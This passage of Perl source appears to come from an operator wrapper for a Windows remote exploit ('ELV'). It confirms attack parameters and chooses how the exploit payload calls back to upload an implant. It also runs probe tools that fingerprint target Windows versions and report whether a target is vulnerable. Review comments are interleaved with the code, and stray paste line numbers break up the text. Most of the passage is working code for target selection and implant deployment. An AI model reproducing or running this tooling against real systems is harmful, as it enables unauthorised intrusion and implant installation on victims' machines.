                if( ($continue eq "q") or ($continue eq "Q") or ($continue eq "quit") or ($continue eq "QUIT") ) {
                    &EU_ExitMessage(1,"User terminated script\n");
                }
                elsif( ($continue eq "n") or ($continue eq "N") or ($continue eq "no") or ($continue eq "NO") ) {
                    &EU_Log(1, "Returning to top of script...\n");
                    next;
                }
                else {
                    $touchFlag = "n";
                }
            }
            else {

                $retcode = &EU_GetInput("\nUse \"$WindowsVersion\" as the target Windows Version ([y],n)? ", "y");
                if( ($retcode eq "n") or ($retcode eq "N") or ($retcode eq "no") or ($retcode eq "NO") ) {
                    $retcode = &EU_GetInput("\n*CAUTION* Are you CERTAIN that you wish to defy the probe results (y,[n])? ", "n");

                    if( ($retcode eq "n") or ($retcode eq "N") or ($retcode eq "no") or ($retcode eq "NO") ) {
                        &EU_Log(1,"Good. Using probe results for the target machine type.\n");
                    }
                    else {
                        $touchFlag = "n";
                    }
                }
            }

        }

        # Socket re-use is rejected for an NT 4.0 result; restart the dialogue.
        if(($EggSocketStatus eq $::EGG_SOCKET_REUSE) and ($WindowsVersion eq $nt4)) {
            &EU_Log(1, "\nERROR: Egg socket option REUSE is not supported on $nt4.");
            &EU_Log(1, "Please select the option to create a NEW socket.");
            next;
        }

        # --- Second confirmation, now including the Windows version ---
        &EU_Log(1,"\nConfirm Network Parameters:");
        &EU_Log(1,"\tRoot Directory : $root_dir");
        &EU_Log(1,"\tLocal IP : $LocalIp");
        &EU_Log(1,"\tPayload file : $PayloadFile");
        &EU_Log(1,"\tPayload drop name : $PayloadDropName");
        &EU_Log(1,"\tRideArea Option : $RideAreaOpt");
        if( $redirectFlag ) {
            &EU_Log(1,"\tUsing Redirection : True");
            &EU_Log(1,"\tLP Redirector IP : $LPRedirectionIp");
            &EU_Log(1,"\tLP Redirector Port : $LPRedirectionPort");
        }
        else {
            &EU_Log(1,"\tUsing Redirection : False");
        }
        &EU_Log(1,"\tTarget IP : $DestinationIp");
        &EU_Log(1,"\tTarget Port : $DestinationPort");

        if( $EggSocketStatus eq $::EGG_SOCKET_NEW ) {
            &EU_Log(1,"\tEgg Socket Status : New");
            if( $redirectFlag ) {
                &EU_Log(1,"\tEgg Callback IP : $EggCallbackIp (Middle Redirector)");
            }
            else {
                &EU_Log(1,"\tEgg Callback IP : $EggCallbackIp");
            }
            &EU_Log(1,"\tEgg Callback Port : $EggCallbackPort");
        }
        elsif( $EggSocketStatus eq $::EGG_SOCKET_REUSE ) {
            &EU_Log(1,"\tEgg Socket Status : Reuse");
        }
        else {
            &EU_Log(1,"\tEgg Socket Status : None");
        }

        if( $ImplantSocketStatus eq $::IMPLANT_SOCKET_MAINTAIN ) {
            &EU_Log(1,"\tExploit Socket Status : Maintain (Use existing connection for the entire operation.)");
        }
        else {
            &EU_Log(1,"\tExploit Socket Status : Close (Existing connection will NOT be used for the entire operation.)");
        }

        &EU_Log(1,"\tTransport Protocol : $TransportProtocol");
        &EU_Log(1,"\tApplication Protocol : $ApplicationProtocol");
        &EU_Log(1,"\tRpc Connection flag : $RpcConnection");

        &EU_Log(1,"\tNetwork Time Out : $TimeOutValue sec");
        &EU_Log(1,"\tWindows Version : $WindowsVersion");

        $continue = &EU_GetInput("\nContinue with the current values ([y],n,quit)? ","y");
        &EU_Log(0, "\nContinue with the current values ([y],n,quit)? $continue");

        if( ($continue eq "y") or ($continue eq "yes") or ($continue eq "Y") or ($continue eq "YES") ) {
            last;
        }
        elsif( ($continue eq "q") or ($continue eq "quit") or ($continue eq "Q") or ($continue eq "QUIT") ) {
            &EU_ExitMessage(1,"User terminated script\n");
        }
        else {
            &EU_Log(1, "Returning to top of script...\n");
            next;
        }

    }

    # Translate the version display string into the numeric code passed to
    # ELV.exe with -w. Only four strings have a code; every other result,
    # including the "Service Pack" variants and "NOT GOOD", becomes 0.
    if( $WindowsVersion eq $nt4 ) { $WindowsVersion = 2; }
    elsif( $WindowsVersion eq $w2k ) { $WindowsVersion = 3; }
    elsif( $WindowsVersion eq $wxp ) { $WindowsVersion = 4; }
    elsif( $WindowsVersion eq $ws2003 ) { $WindowsVersion = 5; }
    else {$WindowsVersion = 0;}

    return ($TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName, $TimeOutValue,
            $TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
            $EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
            $WindowsVersion, $TargetServerIp);
}
  803.  
  804.  
  805.  
  806.  
  807.  
  808.  
  809.  
  # Interactive prompt that decides how two connections are handled and returns
  # the pair ($ImplantSocketStatus, $EggSocketStatus).
  #
  # Both status arguments are overwritten before they are read, so only
  # $PayloadType influences the result:
  #   - the egg status comes from the operator's 0/1 menu choice;
  #   - the implant status starts as $::IMPLANT_SOCKET_NEW and becomes
  #     $::IMPLANT_SOCKET_MAINTAIN only when $PayloadType is "d", a new egg
  #     socket was chosen, and the operator answers y/Y/yes/YES.
  #
  # NOTE(review): the sub is declared with an empty prototype "()" yet unpacks
  # three arguments from @_. That only works when the prototype is not applied
  # at the call site (for example the &name(...) form); callers are not visible
  # here, so confirm before changing the declaration.
  sub get_socket_options()
  {
      my ($ImplantSocketStatus, $EggSocketStatus, $PayloadType) = @_;

      my $reuse_label    = "Re-use existing socket connection";
      my $new_label      = "Create a new socket connection";
      my $maintain_label = "Maintain this socket for the Implant connection with the LP";

      # Menu answer -> egg socket status.
      my %egg_status_for = (
          "0" => $::EGG_SOCKET_REUSE,
          "1" => $::EGG_SOCKET_NEW,
      );

      # Answers accepted as "yes" for the follow-up question (exact match only).
      my %is_yes = ( "y" => 1, "Y" => 1, "yes" => 1, "YES" => 1 );

      &EU_Log(1,"\nThe ELV Exploit Payload Must Call-back in Order to Upload the Implant Payload.");
      &EU_Log(1,"Select the Socket Option To Use:\n");
      &EU_Log(1," 0) $reuse_label");
      &EU_Log(1," 1) $new_label");

      # Keep asking until the answer is exactly "0" or "1"; every answer is
      # echoed to the log at level 0 before it is validated.
      my $choice;
      while (1) {
          $choice = &EU_GetInput("\nEnter selection [0]: ", "0");
          &EU_Log(0, "\nEnter selection [0]: $choice");

          if (exists $egg_status_for{$choice}) {
              $EggSocketStatus = $egg_status_for{$choice};
              last;
          }

          &EU_Log(1, "Invalid option. Try again or enter 'quit'.");
      }

      $ImplantSocketStatus = $::IMPLANT_SOCKET_NEW;

      # Payload types other than "d" never get the follow-up question.
      return ($ImplantSocketStatus, $EggSocketStatus) if $PayloadType ne "d";

      if ($EggSocketStatus ne $::EGG_SOCKET_NEW) {
          # Socket re-use: nothing further to decide, just inform the operator.
          &EU_Log(1,"\nWhen re-using existing socket connection, operator must reconnect to the ");
          &EU_Log(1,"implant for the operation. Original socket will be closed after the target");
          &EU_Log(1,"has been exploited and the implant deployed.");
          return ($ImplantSocketStatus, $EggSocketStatus);
      }

      $choice = &EU_GetInput("\n$maintain_label ([y],n)? ", "y");
      &EU_Log(0, "\n$maintain_label ([y],n)? $choice");
      if ($is_yes{$choice}) {
          $ImplantSocketStatus = $::IMPLANT_SOCKET_MAINTAIN;
      }

      return ($ImplantSocketStatus, $EggSocketStatus);
  }
  862.  
  863.  
  864.  
  # Runs the external program named by $::EXPLOIT_EXE in "touch" mode and turns
  # its textual output into a three-element result:
  #   ($WindowsVersion, $bVulnerable, $bError)
  #
  # Only $::RUN_PROBE_1 is accepted as $touchType; any other value is logged
  # and reported as ($not, 0, 1) without running anything.
  #
  # Each output line is echoed through EU_Log and compared against an ordered
  # list of patterns; the first pattern that matches decides which result
  # field is updated, so a line is never counted twice.
  #
  # NOTE(review), behaviour kept as found:
  #   - Every argument is interpolated unquoted into one command string that is
  #     run through a two-argument piped open; nothing is validated in this
  #     sub, so that has to happen in the caller.
  #   - The pipe is never closed explicitly and the child's exit status is not
  #     inspected; only the word ERROR in the output sets $bError.
  #   - The "." in "NT 4.0" is an unescaped regex metacharacter and matches any
  #     character.
  #   - "new FileHandle" is indirect-object syntax and relies on FileHandle
  #     being loaded elsewhere in the file.
  #   - The empty prototype "()" does not describe the nine arguments read
  #     from @_.
  sub run_elvtouch()
  {
      my ($root_dir, $TargetIp, $TargetPort, $TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection, $TargetServerIp, $TimeOutValue, $touchType) = @_;
      my $handle = new FileHandle;

      my $WindowsVersion = $not;
      my $bVulnerable    = 0;
      my $bError         = 0;

      unless ($touchType eq $::RUN_PROBE_1) {
          $bError = 1;
          &EU_Log(1, "ERROR: Touch Type \"$touchType\" not supported\n");
          return ($WindowsVersion,$bVulnerable,$bError);
      }

      # Ordered rules: [ pattern, reference to the field to set, value ].
      my @rules = (
          [ qr/Looks like Windows NT 4.0/,                         \$WindowsVersion, $nt4       ],
          [ qr/Looks like Windows 2000/,                           \$WindowsVersion, $w2k       ],
          [ qr/Looks like Windows XP SP2/,                         \$WindowsVersion, $wxpsp2    ],
          [ qr/Looks like Windows XP \(SP1 and below\)/,           \$WindowsVersion, $wxp       ],
          [ qr/Looks like Windows Server 2003 SP1/,                \$WindowsVersion, $ws2003sp1 ],
          [ qr/Looks like Windows Server 2003 \(Base release\)/,   \$WindowsVersion, $ws2003    ],
          [ qr/Looks like UNKNOWN Windows version/,                \$WindowsVersion, $not       ],
          [ qr/Target is vulnerable/,                              \$bVulnerable,    1          ],
          [ qr/Target is NOT vulnerable/,                          \$bVulnerable,    0          ],
          [ qr/ERROR/,                                             \$bError,         1          ],
      );

      my $cmdline = "\"$root_dir\\$::EXPLOIT_EXE\" -r $touchType -i $TargetIp -p $TargetPort -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -h $TargetServerIp -o $TimeOutValue";
      &EU_Log(0, "$cmdline");

      &EU_Log(0, "Touching target...");
      open($handle, "$cmdline|")
          or &EU_ExitMessage(1, "Unable to execute $::EXPLOIT_EXE");

      # The early return above already guarantees $touchType is RUN_PROBE_1,
      # so the output is always parsed with the rule list.
      while (<$handle>) {
          chomp(my $text = $_);
          &EU_Log(1, $text);

          for my $rule (@rules) {
              my ($pattern, $field, $value) = @{$rule};
              if ($text =~ $pattern) {
                  ${$field} = $value;
                  last;
              }
          }
      }

      &EU_Log(0, "run_elvtouch:\n\tWindowsVersion: $WindowsVersion\n\tbVulnerable: $bVulnerable\n\tbError: $bError\n");

      return ($WindowsVersion,$bVulnerable,$bError);
  }
  933.  
  934.  
  935.  
  # Runs the external program named by $::RPCTOUCHII with the requested
  # $RunOption and classifies its textual output.
  #
  # Returns ($AtsvcPort, $ProbeError) when $RunOption is
  # $RPCTOUCHII_RUN_RPC_INTERFACE_PORT, otherwise ($MachineType, $ProbeError).
  #
  # Every probe mode has its own ordered pattern list. Each output line is
  # echoed through EU_Log and the first matching pattern sets $MachineType
  # (and, for some patterns, $ProbeError). $ProbeError is never cleared once
  # set. If $RunOption matches none of the known modes the output is not read
  # at all and the initial values ($not, 0) are returned.
  #
  # NOTE(review), behaviour kept as found:
  #   - The failure message names $::REGPROBE although the command that was
  #     built uses $::RPCTOUCHII; this looks like a copy/paste slip.
  #   - Arguments are interpolated unquoted into one command string run via a
  #     two-argument piped open; nothing is validated here.
  #   - The pipe is never closed explicitly and the exit status is ignored.
  #   - In interface-port mode ERROR lines are not examined, so $ProbeError
  #     stays 0, and the port is the raw text between the first and second
  #     ':' (surrounding whitespace included).
  #   - "." in "NT 4.0" is an unescaped regex metacharacter.
  #   - "new FileHandle" is indirect-object syntax and the empty prototype "()"
  #     does not describe the eight arguments read from @_.
  sub launch_rpctouchii() {
      my ($root_dir, $TargetIp, $TargetPort, $RunOption, $TargetTransportProtocol, $TargetApplicationProtocol, $TargetServerIp, $TimeOutValue) = @_;
      my $handle = new FileHandle;

      my $MachineType = $not;
      my $AtsvcPort   = "Unknown";
      my $ProbeError  = 0;

      my $cmdline = "\"$root_dir\\$::RPCTOUCHII\" -i $TargetIp -p $TargetPort -r $RunOption -t $TargetTransportProtocol -b $TargetApplicationProtocol -h $TargetServerIp -o $TimeOutValue";
      &EU_Log(0, "$cmdline");

      &EU_Log(0, "Probing target...");
      open($handle, "$cmdline|")
          or &EU_ExitMessage(1, "Unable to execute $::REGPROBE");

      # Rule layout: [ pattern, machine type to record, also-set-ProbeError ].
      my $error_rule   = [ qr/ERROR/,                              $not, 1 ];
      my $unknown_rule = [ qr/Looks like UNKNOWN Windows version/, $not, 0 ];
      my @server_2003_rules = (
          [ qr/Looks like Windows Server 2003/, $ws2003, 0 ],
          [ qr/Looks like Windows 2003/,        $ws2003, 0 ],
      );

      # Probe modes in the order they are tested. A mode whose rule list is
      # undef is the interface-port mode, which is parsed separately below.
      my @modes = (
          [ $RPCTOUCHII_RUN_GENERAL_PROBE, [
              $error_rule,
              $unknown_rule,
              [ qr/Looks like Windows 9x/,   $w9x, 0 ],
              [ qr/Looks like Windows NT 4.0/, $nt4, 0 ],
              [ qr/Looks like Windows 2000/, $w2k, 0 ],
              [ qr/Looks like Windows XP/,   $wxp, 0 ],
              @server_2003_rules,
              [ qr/Looks like either Windows XP or Windows Server 2003/, $wxp2003, 0 ],
          ] ],
          [ $RPCTOUCHII_RUN_REGPROBE, [
              $error_rule,
              $unknown_rule,
              [ qr/Looks like either Windows 9x or NT 4.0/,       $w9x,   1 ],
              [ qr/Looks like Windows NT 4.0/,                    $nt4,   0 ],
              [ qr/Looks like either Windows 2000 or Windows XP/, $w2kXp, 0 ],
              @server_2003_rules,
          ] ],
          [ $RPCTOUCHII_RUN_WINDOWS_2003_PROBE, [
              $error_rule,
              $unknown_rule,
              [ qr/Looks like Beta Windows Server 2003/,                $not, 0 ],
              [ qr/Looks like Windows XP Professional or Home Edition/, $wxp, 0 ],
              [ qr/Looks like Windows XP/,                              $wxp, 0 ],
              @server_2003_rules,
          ] ],
          [ $RPCTOUCHII_RUN_XP_SP0_PROBE, [
              $error_rule,
              [ qr/Service Pack 0/, $wxpsp0, 0 ],
              [ qr/Service Pack 1/, $wxpsp1, 0 ],
          ] ],
          [ $RPCTOUCHII_RUN_RPC_INTERFACE_PORT, undef ],
          [ $RPCTOUCHII_RUN_WINDOWS_2000_SP4_PROBE, [
              $error_rule,
              [ qr/Windows 2000 Service Pack 0, 1, 2, or 3/, $w2ksp0123, 0 ],
              [ qr/Windows 2000 Service Pack 4/,             $w2ksp4,    0 ],
          ] ],
      );

      # First mode whose option string equals $RunOption, if any.
      my ($mode) = grep { $RunOption eq $_->[0] } @modes;

      my $label;
      if ($mode) {
          my $rules = $mode->[1];

          while (<$handle>) {
              chomp(my $text = $_);
              &EU_Log(1, $text);

              if (!$rules) {
                  # Interface-port mode: keep what follows the first ':'.
                  if ($text =~ /^Port number for Atsvc/) {
                      ($label, $AtsvcPort) = split(/:/, $text);
                  }
                  next;
              }

              for my $rule (@{$rules}) {
                  my ($pattern, $type, $is_error) = @{$rule};
                  next unless $text =~ $pattern;
                  $ProbeError  = 1 if $is_error;
                  $MachineType = $type;
                  last;
              }
          }
      }

      return ($AtsvcPort, $ProbeError)
          if $RunOption eq $RPCTOUCHII_RUN_RPC_INTERFACE_PORT;
      return ($MachineType, $ProbeError);
  }
  1108.  
  1109.  
  1110.  
  1111. __END__